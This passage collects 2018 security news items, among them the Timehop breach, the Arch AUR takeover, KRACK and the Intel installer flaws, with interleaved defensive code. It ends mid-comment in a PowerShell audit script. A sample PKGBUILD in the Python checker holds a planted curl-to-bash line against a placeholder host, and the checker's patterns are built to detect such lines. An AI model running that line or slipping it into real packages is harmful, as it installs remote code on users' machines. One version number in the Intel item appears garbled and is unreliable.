“HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction,” SEC Consult explained. “As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code.”
The vulnerabilities impact e!DISPLAY 7300T Web Panel models 762-3000, 762-3001, 762-3002 and 762-3003 running firmware version 01. The issues have been patched by the vendor with the release of firmware version 02.
In addition to installing the latest firmware, WAGO has advised customers to restrict network access to the device and avoid connecting it directly to the Internet, restrict the number of users who can access the system, change default passwords, and avoid clicking on links from untrusted sources.
Advisories describing these vulnerabilities have been published by SEC Consult, VDE@CERT, which coordinated the disclosure of the flaws, and WAGO.
This was not the first time SEC Consult identified vulnerabilities in WAGO products. Last year, the company reported finding a potentially serious vulnerability that could give a remote attacker access to an organization’s entire network.
Broadcom Buys Business Software Firm CA for $18.9 Billion
18.7.2018 securityweek IT
Semiconductor giant Broadcom, which recently failed in a bid to buy US rival Qualcomm, on Wednesday announced a cash deal to buy software and services firm CA Technologies for $18.9 billion.
Broadcom described CA as a major provider of information technology management software, in an acquisition that would help the chip maker diversify its offerings.
"This transaction represents an important building block as we create one of the world's leading infrastructure technology companies," Broadcom chief executive Hock Tan said in a release.
The deal was approved by the boards of both companies.
Broadcom will pay $44.50 per share of CA stock; about 20 percent over the closing price for common shares at the end of formal market trading on Wednesday, according to the company.
"We are excited to have reached this definitive agreement with Broadcom," CA Technologies chief Mike Gregoire said in the joint release.
"This combination aligns our expertise in software with Broadcom's leadership in the semiconductor industry."
The companies expected the acquisition to close in the final quarter of this year. The merger must be approved by shareholders and regulators.
Broadcom in April transferred its headquarters from Singapore to the US as promised when it tried to buy Qualcomm.
The prior month, President Donald Trump issued an order barring the proposed $117 billion hostile takeover of Qualcomm, citing what he called "credible evidence" such a deal "threatens to impair the national security of the United States."
It would have been the biggest-ever deal in the tech sector.
Trump's order made no mention of China, but an earlier letter from the US Treasury Department warned that a takeover might hurt US leadership in 5G, super-fast fifth-generation wireless networks now being deployed, and consequently pose a threat to US security.
The presidential action was allowed because Broadcom is a foreign entity, but would not have been possible had it completed its move to Silicon Valley.
On March 14, Broadcom said it was withdrawing its offer for Qualcomm.
Broadcom was founded in California but moved its headquarters after a 2015 deal that merged it with Avago Technologies.
Timehop Shares More Details on Data Breach
18.7.2018 securityweek Incident
Timehop has shared additional details about the recent data breach that impacted roughly 21 million user accounts, including what the attackers did once they gained access to the company’s systems and what other type of information was compromised.
Timehop provides an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites.
Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users, which could have been leveraged to access a user’s posts on social networking websites.
In response to the incident, Timehop invalidated social media tokens to prevent abuse and instructed users to re-authenticate each service.
In an update posted on Wednesday, Timehop revealed that dates of birth, genders, and country codes were also compromised in the incident.
The investigation is ongoing, but so far the company believes the attacker gained access to 20.4 million names, 15.5 million dates of birth, 18.6 million email addresses, 9.2 million gender designations, and 4.9 million phone numbers. Timehop listed separately the number of impacted PII records covered by the recently introduced GDPR.
According to Timehop, the attacker first accessed its systems on December 19, 2017, after stealing an employee’s credentials for the company’s cloud computing environment. The unauthorized access came from an IP address in the Netherlands.
The hacker immediately started conducting reconnaissance, including scraping the list of roles and accounts, but at that time the compromised environment did not store any personal information.
Personal information was copied by Timehop to the compromised database in early April and the attacker only discovered it on June 22. On July 4, the hacker made a copy of the user database and then changed its password. These actions led to service disruptions and internal alerts being triggered, but it took nearly 24 hours for Timehop to determine that it had been breached after the first alert.
“[Timehop engineers] did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” Timehop said. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”
HackerOne Bug Bounty Programs Paid Out $11 Million in 2017
18.7.2018 securityweek Safety
White hat hackers who responsibly disclosed vulnerabilities through bug bounty programs hosted by HackerOne earned more than $11 million last year, according to the company’s 2018 Hacker-Powered Security Report.
HackerOne hosts roughly 1,000 programs that over the past years have received over 72,000 vulnerability reports from researchers in more than 100 countries. The bounties paid out since the launch of the company until June 2018 reached over $31 million.
Of the total, more than $25 million was paid out by organizations in the United States, which was also the country to which the largest share of the money went ($5.3 million).
According to the company, 116 of the bug reports submitted last year resulted in payouts that exceeded $10,000, and the average amount paid out by companies for critical issues has increased to over $2,000, with organizations such as Microsoft and Intel offering as much as $250,000.
An increasing number of companies have launched public bug bounty programs, but still nearly 80% of programs were private last year. The majority of public programs are launched by organizations in the tech sector, which accounts for 63%.
The government sector recorded the biggest increase in new program launches, with the European Commission and Singapore’s Ministry of Defense announcing initiatives. The U.S. government has also continued to run programs, including Hack the Air Force and Hack the Army.
Roughly 27,000 valid vulnerabilities were reported last year and cross-site scripting (XSS) remained the most common type of flaw, followed by information disclosure bugs.
When it comes to the time it takes organizations to patch security holes, the consumer goods industry was the fastest, with an average of 14 days. At the other end of the chart we have the government sector, which patched vulnerabilities, on average, in 68 days.
The highest bug bounty paid out last year was $75,000. A technology firm awarded the sum for three vulnerabilities that could have been chained for remote code execution without user interaction. Successful exploitation could have allowed an attacker to access credit card information, hijack user and employee accounts, access infrastructure code, or deploy mass ransomware campaigns.
The complete 2018 Hacker-Powered Security Report is available from HackerOne in PDF format.
Arch Linux AUR Repository Compromised
12.7.2018 securityweek Incident
A user-maintained Arch Linux AUR (Arch User Repository) software repository was pulled earlier this week after it was found to contain malware.
The repository was apparently compromised by an actor using the handle “xeactor” after its original maintainer abandoned it. The affected repo was a user-maintained PDF viewer called acroread.
The orphaned package was modified on June 7, when xeactor added to it a curl command that fetched and executed a malicious script from an attacker-controlled server. The result was the installation of a persistent program that systemd starts periodically.
The executed scripts were also found to include a component that gathers various data on the compromised machine, including the machine ID, CPU details, Pacman (package management utility) information, and the output of uname -a and systemctl list-units.
The modification was reported on July 8 and the commits were reverted within hours by maintainer Eli Schwartz, who also suspended the offending account and removed two other packages. The affected packages are acroread 9.5.5-8, balz 1.20-3, and minergate 8.1-2.
Some of those who analyzed the modified code suggested that the changes might have been intended as a warning, because the script would create files in such a way that generated a lot of noise. Specifically, a compromised.txt file was created in root and all home folders.
However, the scripts could have been modified at any time to execute arbitrary code, thus turning malicious.
As Arch's Giancarlo Razzolini points out, the issue itself isn’t that severe, despite the attention it has already gathered. All those who download from the AUR do so at their own risk, and such incidents could easily happen more often, he suggests.
“I'm surprised that this type of silly package takeover and malware introduction doesn't happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself,” Razzolini notes.
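A way to do that inspection mechanically, as an added example that is not Arch's or the AUR's own tooling: a small Python checker that flags the pattern used in the acroread takeover (a curl fetch piped into a shell from inside package()), along with writes outside $pkgdir and skipped checksums. The PKGBUILD it scans is constructed for the example, and the example.invalid URLs are placeholders.

```python
"""Static checks to run over an AUR PKGBUILD before makepkg touches it.

Added example, not Arch's or the AUR's tooling.  It flags the pattern used in
the acroread takeover described above: a network fetch piped into a shell from
inside a build function, plus writes outside $pkgdir and skipped checksums.
"""
import re
from dataclasses import dataclass

FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba|z|da)?sh\b")
FUNC_START_RE = re.compile(r"^(\w+)\s*\(\)\s*\{")
# Paths package() has no business touching: everything it installs goes under $pkgdir.
OUTSIDE_PKGDIR_RE = re.compile(r"(^|\s)(/root|/home|/etc/systemd)\b")
SKIPPED_SUM_RE = re.compile(r"sums=\(.*'SKIP'")


@dataclass
class Finding:
    line_no: int
    func: str        # enclosing bash function, or "" at top level
    reason: str
    text: str


def _with_function(lines):
    """Yield (line_no, enclosing_function, line).

    PKGBUILDs are plain bash; makepkg convention is one function per block with
    the closing brace at column 0, which is all this tracker relies on.
    """
    func = ""
    for no, line in enumerate(lines, start=1):
        m = FUNC_START_RE.match(line)
        if m:
            func = m.group(1)
        yield no, func, line
        if func and line.rstrip() == "}":
            func = ""


def inspect_pkgbuild(text: str) -> list:
    """Return Findings in file order; an empty list means nothing suspicious."""
    findings = []
    for no, func, line in _with_function(text.splitlines()):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if FETCH_RE.search(line) and PIPE_TO_SHELL_RE.search(line):
            findings.append(Finding(no, func, "remote script piped into a shell", stripped))
        elif func and FETCH_RE.search(line):
            # Downloads belong in source=() so makepkg can checksum them.
            findings.append(Finding(no, func, "network fetch inside a build function", stripped))
        if func == "package" and OUTSIDE_PKGDIR_RE.search(line):
            findings.append(Finding(no, func, "writes outside $pkgdir", stripped))
        if SKIPPED_SUM_RE.search(line):
            findings.append(Finding(no, func, "checksum verification skipped", stripped))
    return findings


# Constructed PKGBUILD: a plausible orphaned package with a malicious package() step.
SAMPLE_PKGBUILD = """\
# Maintainer: (orphaned)
pkgname=example-viewer
pkgver=1.0
pkgrel=2
source=("https://example.invalid/example-viewer-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
    cd "$srcdir/$pkgname-$pkgver"
    make
}

package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    # takeover pattern: fetched at build time, never checksummed, never reviewed
    curl -s https://example.invalid/hidden.sh | bash -
    echo compromised > /root/compromised.txt
}
"""

if __name__ == "__main__":
    for f in inspect_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {f.line_no} [{f.func or 'top level'}]: {f.reason}: {f.text}")
```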
Late last month, the developers of the Gentoo Linux distribution informed users that one of their GitHub accounts was compromised and that attackers planted malicious code. Gentoo’s infrastructure and repository mirrors weren’t affected.
As Facial Recognition Use Grows, So Do Privacy Fears
12.7.2018 securityweek Privacy
The unique features of your face can allow you to unlock your new iPhone, access your bank account or even "smile to pay" for some goods and services.
The same technology, using algorithms generated by a facial scan, can allow law enforcement to find a wanted person in a crowd or match the image of someone in police custody to a database of known offenders.
Facial recognition came into play last month when a suspect arrested for a shooting at a newsroom in Annapolis, Maryland, refused to cooperate with police and could not immediately be identified using fingerprints.
"We would have been much longer in identifying him and being able to push forward in the investigation without that system," said Anne Arundel County police chief Timothy Altomare.
Facial recognition is playing an increasing role in law enforcement, border security and other purposes in the US and around the world.
While most observers acknowledge the merits of some uses of this biometric identification, the technology evokes fears of a "Big Brother" surveillance state.
Heightening those concerns are studies showing facial recognition may not always be accurate, especially for people of color.
A 2016 Georgetown University study found that one in two American adults, or 117 million people, are in facial recognition databases with few rules on how these systems may be accessed.
A growing fear for civil liberties activists is that law enforcement will deploy facial recognition in "real time" through drones, body cameras and dash cams.
"The real concern is police on patrol identifying law-abiding Americans at will with body cameras," said Matthew Feeney, specialist in emerging technologies at the Cato Institute, a libertarian think tank.
"This technology is of course improving but it's not as accurate as science fiction films would make you think."
- 'Aggressive' deployments -
China is at the forefront of facial recognition, using the technology to fine traffic violators and "shame" jaywalkers, with at least one arrest of a criminal suspect.
Clare Garvie, lead author of the 2016 Georgetown study, said that in the past two years, "facial recognition has been deployed in a more widespread and aggressive manner" in the US, including for border security and at least one international airport.
News that Amazon had begun deploying its Rekognition software to police departments sparked a wave of protests from employees and activists calling on the tech giant to stay away from law enforcement applications.
Amazon is one of dozens of tech firms involved in facial recognition. Microsoft, for example, uses facial recognition for US border security, and the US state of Maryland uses technology from Germany-based Cognitec and Japanese tech firm NEC.
Amazon maintains that it does not conduct surveillance or provide any data to law enforcement, but simply enables them to match images to those in its databases.
The tech giant also claims its facial recognition system can help reunite lost or abducted children with their families and stem human trafficking.
- 'Slippery slope' -
Nonetheless, some say facial recognition should not be deployed by law enforcement because of the potential for errors and abuse.
That was an argument made by Brian Brackeen, founder and the chief executive officer of the facial recognition software developer Kairos.
"As the black chief executive of a software company developing facial recognition services, I have a personal connection to the technology, both culturally and socially," Brackeen said in a blog post on TechCrunch.
"Facial recognition-powered government surveillance is an extraordinary invasion of the privacy of all citizens -- and a slippery slope to losing control of our identities altogether."
The Georgetown study found facial recognition algorithms were five to 10 percent less accurate on African Americans than Caucasians.
- Policy questions -
Microsoft announced last month it had made significant improvements for facial recognition "across skin tones" and genders.
IBM meanwhile said it was launching a large-scale study "to improve the understanding of bias in facial analysis."
While more accurate facial recognition is generally welcomed, civil liberties groups say specific policy safeguards should be in place.
In 2015, several consumer groups dropped out of a government-private initiative to develop standards for facial recognition use, claiming the process was unlikely to develop sufficient privacy protections.
Cato's Feeney said a meaningful move would be to "purge these databases of anyone who isn't currently incarcerated or wanted for violent crime."
Jennifer Lynch, an attorney with the Electronic Frontier Foundation, said that the implications for police surveillance are significant.
"An inaccurate system will implicate people for crimes they did not commit. And it will shift the burden onto defendants to show they are not who the system says they are," Lynch said in a report earlier this year.
Lynch said there are unique risks of breach or misuse of this data, because "we can't change our faces."
Evan Selinger, a philosophy professor at the Rochester Institute of Technology, says facial recognition is too dangerous for law enforcement.
"It's an ideal tool for oppressive surveillance," Selinger said in a blog post.
"It poses such a severe threat in the hands of law enforcement that the problem cannot be contained by imposing procedural safeguards."
Apple Patches KRACK Flaws in Boot Camp
12.7.2018 securityweek Apple
Apple has released an update for its Boot Camp utility to address vulnerabilities related to the wireless Key Reinstallation Attacks (KRACK) that were disclosed late last year.
A total of 10 KRACK vulnerabilities were disclosed in October 2017, all impacting the Wi-Fi standard itself and rendering all Wi-Fi Protected Access II (WPA2) protocol implementations vulnerable. The new type of attack also impacts industrial networking devices.
An attacker looking to exploit the vulnerabilities would need to manipulate and replay handshake messages to trick the victim into reinstalling an already-in-use key. An attacker within Wi-Fi range of a victim would then have access to information previously assumed to be safely encrypted.
Vendors raced to patch the flaws, and Apple itself released a first set of KRACK-related patches in October last year, for iOS, macOS, tvOS, and watchOS devices. The company also addressed the bugs in Apple Watch and AirPort Base Station Firmware.
Apple is now pushing a fix for Boot Camp, the multi-boot utility included in macOS that allows users to install Microsoft Windows operating systems on Intel-based Macs.
With the release of a Wi-Fi Update for Boot Camp 6.4.0 last week, the Cupertino-based tech giant is addressing a total of three KRACK-related flaws, which are tracked as CVE-2017-13077, CVE-2017-13078, and CVE-2017-13080.
By targeting vulnerable devices, an attacker in Wi-Fi range may force nonce reuse in WPA unicast/PTK clients or in WPA multicast/GTK clients, Apple explains in an advisory.
The software update, the company explains, is available for a broad range of machines running Boot Camp, including MacBook (Late 2009 and later), MacBook Pro (Mid 2010 and later), MacBook Air (Late 2010 and later), Mac mini (Mid 2010 and later), iMac (Late 2009 and later), and Mac Pro (Mid 2010 and later).
“A logic issue existed in the handling of state transitions. This was addressed with improved state management,” Apple noted.
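The state-transition bug described above, in a toy model added here (not Apple's code or any 802.11 implementation): the packet number that serves as the CCMP nonce is reset to zero when a key is installed, so a supplicant that accepts a retransmitted message 3 and reinstalls the PTK it already uses repeats a nonce, while a supplicant that keeps the installed key does not. The keystream is a constructed HMAC-SHA256 counter-mode stand-in, not AES-CCMP, used only to show why a repeated nonce matters.

```python
"""Toy model of the KRACK key-reinstallation state bug and its fix.

Added example, not Apple's code or an 802.11 implementation.  The cipher is a
stand-in counter-mode keystream built from HMAC-SHA256; real WPA2 uses
AES-CCMP, but the rule it illustrates is the same: one (key, nonce) pair must
never encrypt two different frames.
"""
import hashlib
import hmac


def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Counter-mode keystream from (key, nonce): the same pair gives the same bytes."""
    out = b""
    block = 0
    while len(out) < length:
        # 48-bit nonce like the CCMP packet number, plus a 32-bit block counter.
        msg = nonce.to_bytes(6, "big") + block.to_bytes(4, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Client side of the 4-way handshake, reduced to what KRACK touches.

    The packet number (PN) is the per-frame nonce.  Installing the PTK resets
    it to zero, so installing the same PTK twice is what turns a replayed
    message 3 into nonce reuse.  The GTK (multicast) case works the same way.
    """

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.pn = 0

    def on_message3(self, ptk: bytes) -> str:
        """Handle message 3 of the handshake (possibly a retransmission)."""
        if self.patched and self.ptk == ptk:
            # Fixed state management: key already in use, acknowledge, do not reinstall.
            return "ack, key kept"
        self.ptk = ptk
        self.pn = 0          # the reset that must only ever happen once per key
        return "ack, key installed"

    def send(self, plaintext: bytes):
        """Encrypt one data frame under the installed key; returns (PN, ciphertext)."""
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))


def replayed_message3(patched: bool) -> dict:
    """Message 3, one data frame, a retransmitted message 3, another data frame."""
    ptk = hashlib.sha256(b"constructed PTK for the example").digest()
    client = Supplicant(patched)
    p1, p2 = b"first data frame ", b"second data frame"   # equal length for the xor
    client.on_message3(ptk)
    pn1, c1 = client.send(p1)
    client.on_message3(ptk)          # message 3 arrives again (e.g. lost message 4)
    pn2, c2 = client.send(p2)
    # With a reused nonce the two keystreams cancel, so c1 xor c2 == p1 xor p2:
    # plaintext relationships leak to anyone who captured both frames, key unknown.
    return {
        "second_install": pn2 <= pn1,
        "nonce_reused": pn1 == pn2,
        "keystreams_cancel": xor(c1, c2) == xor(p1, p2),
    }


if __name__ == "__main__":
    print("unpatched:", replayed_message3(patched=False))
    print("patched:  ", replayed_message3(patched=True))
```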
Timehop Data Breach Hits 21 Million Users
12.7.2018 securityweek Incident
Timehop informed users late last week that hackers gained unauthorized access to some of its systems as part of an attack that impacts roughly 21 million accounts.
New York-based Timehop has created an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites. The app also allows users to share these memories with their friends.
According to Timehop, the attacker accessed a database storing usernames, phone numbers, email addresses and social media access tokens. The incident affects approximately 21 million accounts, but only social media access tokens were exposed for all of them. Roughly 4.7 million accounts included phone numbers.
The compromised tokens can allow a malicious actor to access some of the targeted user’s social media posts, but they do not provide access to private messages. Moreover, Timehop has highlighted that there is no evidence of any unauthorized access using these tokens.
“In general, Timehop only has access to social media posts you post yourself to your profile. However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts - again, we have no evidence that this actually happened,” Timehop said.
The compromised tokens have been invalidated so users will have to re-authenticate each service with Timehop, a process that will generate new tokens.
The breach was discovered on July 4, but an investigation conducted by the company showed that the attack started as early as December 19, 2017, when hackers obtained admin credentials for cloud computing services used by Timehop.
“This unauthorized user created a new administrative user account, and began conducting reconnaissance activities within our Cloud Computing Environment. For the next two days, and on one day in March, 2018, and one day in June, 2018, the unauthorized user logged in again and continued to conduct reconnaissance,” the company explained.
The malicious activity was detected on July 4 after the attacker accessed a production database and started transferring data, which triggered an alarm.
Timehop says it took just over two hours to contain the incident after it was detected. The company has launched an investigation in collaboration with law enforcement, an incident response firm, and a threat intelligence company. Timehop has published both high-level and more technical reports on the incident.
The company has also retained the services of GDPR specialists to help it address the implications of the breach in Europe.
German Hosting Firm DomainFactory Hacked
12.7.2018 securityweek Hacking
DomainFactory, a Germany-based web hosting services provider that belongs to GoDaddy-owned Host Europe Group, informed customers late last week that their personal and financial information was exposed after a hacker gained access to some of its systems.
According to DomainFactory, one of the largest hosting firms in Germany, the breach occurred in late January, but the company only learned of the incident on July 3 after the hacker started disclosing samples of the stolen information on the DomainFactory forum.
The hack is still being investigated, but the attacker appears to have gained access to data such as customer name, company name, customer number, address, email address, phone number, DomainFactory phone password, date of birth, and bank name and account number.
The company says it has secured the point of entry used by the hacker, but has warned customers that the compromised information may be misused for financial fraud and other types of attacks.
Users have been instructed to change their passwords, including for their DomainFactory, DomainFactory phone, email, FTP, SSH and MySQL accounts.
According to German publication Heise, the hacker published a post on the DomainFactory forum on July 3 claiming to have gained access to one of the company’s customer databases. Both Heise and some of the impacted users have confirmed that the data appears to be legitimate.
The hacker has created the Twitter account “@NaHabedere” and claims to be from Austria. He told Heise that he breached DomainFactory in an effort to obtain information on a person who owes him money and decided to disclose the hack after the company failed to notify customers. The hacker apparently does not plan on selling or publishing the data he obtained.
DomainFactory has shut down its forum following the breach. Users have been advised to monitor their bank statements and report any suspicious activity to authorities.
UK Financial Authorities Publish Paper On Operational Resilience
12.7.2018 securityweek IT
UK Financial Authorities' Paper on Resilience Potentially Silos Continuity from Data Protection
The Bank of England (BofE), the UK's Prudential Regulation Authority (PRA), and the UK's Financial Conduct Authority (FCA) -- together known as the financial supervisory authorities -- have jointly published a discussion paper (PDF) on building operational resilience into the financial sector. While cyber is a major risk, the concept is to build resilience to all risks including cyber.
Regulated firms, financial market infrastructures (FMIs), consumers, industry bodies, auditors, specialist third-party providers, professional advisors and other regulators are invited to comment on the paper by 5 October 2018. The paper notes that there is currently no global framework for resilience, and says that the authorities "will share our insights with the global regulatory community."
While the paper does not differentiate between the types of risk to continuity, it nevertheless reflects a great deal of current thinking about cyber risk. It suggests that relevant companies should plan on the assumption that disruption will occur, as well as seeking to prevent it. Current cyber advice is that companies should assume they either are currently breached or will be breached in the future.
Consequently, the key to resilience is for the board to define "the level of disruption that could be tolerated" (CISOs call this the 'risk appetite'); and for the risk managers (CISOs for the cyber aspect) to put in place the means to confine any disruption within those bounds. This is the thinking behind cyber advice to concentrate on incident response.
The paper takes the view that concentrating on resilience is consistent with the Bank of England's Financial Policy Committee's (FPC) work on cyber risk. "The FPC identifies, monitors and takes action to remove or reduce systemic risks with a view to protecting and enhancing the resilience of the UK financial system. The FPC has been considering whether testing the financial system for disruption from cyber incidents is warranted for the purpose of enhancing and maintaining UK financial stability. While the FPC has been doing this in the context of cyber, the concepts are relevant to operational resilience regardless of the specific cause of disruption."
Indeed, the recommended process for evaluating and reducing the risk to resilience is similar to the recommended process for evaluating and reducing cyber risk.
But where the paper diverges from current cyber thinking is the view "that managing operational resilience is most effectively addressed by focusing on business services, rather than on systems and processes." It is a question of emphasis, and is similar in concept to the ongoing difficulties between operational technology and information technology: OT frequently prioritizes continuity over data protection. While few cyber experts believe that security can be obtained by technology alone, even fewer believe it can be obtained without it.
In the financial sector it is feasible that risk management might conclude that maintaining legacy systems is more important to operational continuity than the cyber risk to those same legacy systems; or that the introduction of new cyber security technologies might be operationally disruptive. Neil Costigan, CEO at BehavioSec, sees a danger here. "This is less about appropriate technology than practices and thinking," he told SecurityWeek. "It does, I guess, offer solid support for CISOs to lobby their boards about the threats and expectations; but I see it as recommendations/guidelines/advice for silos."
While current cyber thinking is that OT and IT need to merge, there is a danger that this emphasis on continuity and processes might maintain and even promote the separation. Costigan goes further, suggesting the UK might be missing an opportunity here: the paper discusses individual bank responsibility, whereas sector resilience is arguably a shared responsibility.
"If you look at Sweden and Norway," he said, "you'll see that the banks do not operate in isolation -- security is viewed as a collective responsibility." He gives the example of BankID -- a single identity system that operates across multiple financial institutions, and has been recognized as a legally binding signature in other areas.
Dan Sloshberg, director of product marketing at Mimecast, suggests that concentrating on resilience will automatically include cyber issues. "WannaCry was a wakeup call and highlighted the disruptive power and scale cyber-attacks can have on our critical national infrastructure," he says. "Organizations can also learn from the new NIS Directive. This legislation clearly signals the move away from pure protection-based cybersecurity thinking. Robust business continuity strategies have never been more important to ensure organizations can continue to operate during an attack and get back up on their feet quickly afterwards."
Dave Ginsburg, VP of marketing at Cavirin, sees the paper as a reasonable attempt to improve resiliency in a changing world. He notes that since the IRA bombing threat to London during The Troubles last century in the UK, and 9/11 in the U.S., banks in both countries have had effective disaster recovery operations in place.
"However," he told SecurityWeek, "financial interconnections and interdependencies are much more complicated than they were 17 years ago. What the UK is getting at is putting in place the mechanisms to preserve the financial 'supply chain' if the worst occurs due to physical or cyberattack. Everyday approaches to physical security and user training don't necessarily address this, and one would hope that institutions in the US, if not implementing such an approach already, may use this as a template. And, it need not only apply to finance, but to the cyber posture of other critical systems such as telecommunications, transportation, electricity, and water supply, to name a few."
"The concept of impact tolerance is core to the supervisory authorities' thinking," comments the paper, "and may challenge firms and FMIs to think differently. It encourages them to assume operational disruptions will occur. This means that attention can be directed towards minimizing the impact of disruption on important business services. Impact tolerance focuses firms, FMIs and the supervisory authorities on the potential vulnerabilities in business and operating models. The work they do to increase the resilience of these need not be tied to specific threats, rather an important business service should be made resilient to a wide variety of threats."
The paper highlights an unpalatable truth for consumers: in critical industries such as the financial sector, operational continuity is more important than data protection -- including PII. Concentrating resources on continuity could feasibly leave customer data more exposed to cyber-attack. Having PII stolen does not normally directly impinge on continuity, and could conceivably be considered of lesser importance (at least as far as the financial regulators are concerned).
The problem for individual firms within such critical industries is that any ensuing resilience regulations will not excuse them from existing data protection regulations. By treating resiliency as a separate issue to data protection, it merely complicates an already complicated regulatory environment.
Intel Patches Security Flaws in Processor Diagnostic Tool
12.7.2018 securityweek Vulnerability
Intel has updated its Processor Diagnostic Tool to address vulnerabilities that could lead to arbitrary code execution and escalation of privileges.
The Intel Processor Diagnostic Tool (IPDT) is a piece of software designed to verify the functionality of an Intel processor. It can check for brand identification and operating frequency, test specific features, and perform a stress test on the processor.
The recently addressed vulnerabilities (two of which are tracked as CVE-2018-3667 and CVE-2018-3668) were found by Stephan Kanthak and affect the IPDT releases up to v188.8.131.52, Intel reveals.
Kanthak says he found a total of four vulnerabilities in the executable installers of Intel’s tool, three of which would lead to arbitrary code execution with escalation of privilege, and a fourth that could lead to denial of service.
The security flaws can be exploited in standard Windows installations where the UAC-protected administrator account created during Windows setup is used, without elevation.
“This precondition holds for the majority of Windows installations: according to Microsoft's own security intelligence reports <https://www.microsoft.com/security/sir>, about 1/2 to 3/4 of the about 600 million Windows installations which send telemetry data have only ONE active user account,” Kanthak points out.
The issue is that the IPDT installer creates three files with improper permissions, thus opening the door to said vulnerabilities.
One issue was that the installer created a randomly named folder in the %TEMP% directory, copied itself into it, and then executed the copy. Because the folder and the copy inherit the NTFS access control list from %TEMP%, the installer fails to run whenever execution of files from that directory is denied, which is the denial-of-service issue.
Another issue was that the copy of the executable self-extractor would run with administrative privileges, but the extracted payloads (the installers setup.exe and setup64.exe, and the batch script setup.bat) are dropped unprotected into the user's %TEMP% directory. The copy would also change directory to %TEMP% and execute the batch script %TEMP%\setup.bat.
“The extracted files inherit the NTFS ACLs from their parent %TEMP%, allowing ‘full access’ for the unprivileged (owning) user, who can replace/overwrite the files between their creation and execution. Since the files are executed with administrative privileges, this vulnerability results in arbitrary code execution with escalation of privilege,” the researcher notes.
Because setup.bat calls setup.exe and setup64.exe without a path, the command processor looks for them first in the current working directory and, if they are not found there, in each directory listed in %PATH%.
On Windows Vista and newer, however, the current working directory can be removed from that search path, and an unprivileged user, who has full control of %PATH%, can then place rogue files with those two names in an arbitrary directory they add to %PATH%, again resulting in arbitrary code execution with escalation of privilege.
The researcher also discovered that the two setup executables load multiple Windows system DLLs from their "application directory" in the %TEMP% folder instead of from Windows' "system directory."
“An unprivileged attacker running in the same user account can copy rogue DLLs into %TEMP%; these are loaded and their DllMain() routine executed with administrative privileges, once more resulting in arbitrary code execution with escalation of privilege,” the researcher points out.
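As an added example (not Intel's tool or Kanthak's code), the PowerShell audit below inspects a directory an elevated installer unpacked into and reports the three weakness classes just described: files a non-administrative principal can overwrite before they run, batch scripts that name executables without a path, and DLLs that carry a system DLL's name. The default extraction path is a constructed placeholder.

```powershell
# Added audit script (not part of Intel's IPDT or Kanthak's report): inspect a
# directory an elevated installer unpacked into and report the three weakness
# classes described above. Run it as the unprivileged user who launched the
# installer, passing the real extraction folder as -ExtractDir.
param(
    # Constructed placeholder; point this at the installer's actual %TEMP% subfolder.
    [string]$ExtractDir = (Join-Path $env:TEMP 'installer_extract_placeholder')
)

if (-not (Test-Path -Path $ExtractDir -PathType Container)) {
    throw "Extraction directory not found: $ExtractDir"
}

$findings = @()

# 1. Files created under %TEMP% inherit its ACL, so any principal other than
#    SYSTEM, Administrators or TrustedInstaller holding write/modify/full rights
#    on a file the elevated installer will execute is a replace-before-run window.
$trusted   = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

foreach ($file in Get-ChildItem -Path $ExtractDir -Recurse -File -Include *.exe,*.dll,*.bat,*.cmd) {
    $acl = Get-Acl -Path $file.FullName
    foreach ($ace in $acl.Access) {
        $who = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and
            $trusted -notcontains $who -and
            ((([int]$ace.FileSystemRights) -band $writeMask) -ne 0)) {
            $findings += "WRITABLE    $($file.FullName): $who has $($ace.FileSystemRights) (inherited=$($ace.IsInherited))"
        }
    }
}

# 2. A batch script that names an executable without a path (the setup.bat
#    pattern above) makes cmd.exe search the current directory and then every
#    %PATH% entry, both of which an unprivileged user can influence.
foreach ($script in Get-ChildItem -Path $ExtractDir -Recurse -File -Include *.bat,*.cmd) {
    $lineNo = 0
    foreach ($line in Get-Content -Path $script.FullName) {
        $lineNo++
        $stripped = $line.Trim() -replace '^@', ''
        $stripped = $stripped -replace '^(call|start)\s+', ''
        if ($stripped -eq '' -or $stripped -match '^(rem\b|::)') { continue }
        $cmd = ($stripped -split '\s+')[0].Trim('"')
        # Bare name: no drive letter, directory separator or %variable% prefix.
        if ($cmd -match '^[^\\/:%]+\.(exe|com|bat|cmd)$') {
            $findings += "UNQUALIFIED $($script.Name):${lineNo}: '$cmd' is resolved via the current directory and %PATH%"
        }
    }
}

# 3. A DLL dropped into this writable directory with the name of a Windows
#    system DLL is loaded ahead of the real one by any executable here that
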